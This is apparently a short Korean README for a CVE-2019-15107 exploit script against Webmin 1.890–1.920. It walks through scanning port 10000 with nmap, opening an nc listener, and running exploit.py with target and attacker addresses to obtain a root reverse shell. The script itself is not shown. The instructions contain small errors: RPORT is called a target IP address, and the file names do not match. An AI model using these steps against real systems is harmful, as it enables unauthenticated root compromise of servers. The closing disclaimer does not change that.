
CVE-2019–15107 - Webmin <=1.920 비인증 RCE
이 python 스크립트는 Webmin 1.890에서 root 셸을 제공합니다.
nmap으로 확인:
nmap -sC -sV -p 10000 TARGET_IP
결과:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
이 익스플로잇 사용 방법:
1단계:
nc -lnvp LPORT
2단계:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = 대상
RPORT = 대상 IP 주소 (보통 10000)
LHOST = 사용자의 Kali 박스
LPORT = 사용자의 리버스 셸 포트
3단계: root 셸을 획득하세요!
인가되지 않은 시스템에 피해를 주지 마십시오!!!